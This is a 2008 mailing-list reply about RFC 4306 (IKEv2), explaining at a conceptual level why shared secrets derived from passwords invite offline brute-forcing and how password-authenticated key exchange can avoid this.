Re: shared secrets from passwords

On Jan 31, 2008, at 3:44 PM, Florian Weimer wrote:

> * Yoav Nir:
>
>> The idea is that this shared secret has the properties that (a) it
>> can't be used for anything other than IKEv2 so storing it is
>> presumably OK (why?), and (b) it looks random. The RFC goes on to
>> state this:
>>
>>                                As noted above, deriving the shared
>>   secret from a password is not secure.  This construction is used
>>   because it is anticipated that people will do it anyway.
>
> [RFC 4306]
>
> In retrospect, this is a bit off--it's insecure in what context?

Depends on the usage. If one uses password-derived shared secret to   
authenticate key agreement (using it in HMAC-like construct or  
otherwise in place of a "good" shared secret), or worse - as keying  
material - then it's insecure because an attacker can perform off- 
line brute-forcing on the observed exchange targeting the weak link -  
the password itself. However there are ways (Encrypted Key Exchange  
is the best example) to authenticate DH using password-derived shared  
secret with sufficient security.

Also, the more complex the password is (length, distance from  
dictionary-found words, use of full-spectrum alphabet) - the more  
computing resources the attacker would need to have a reasonable  
chance of success.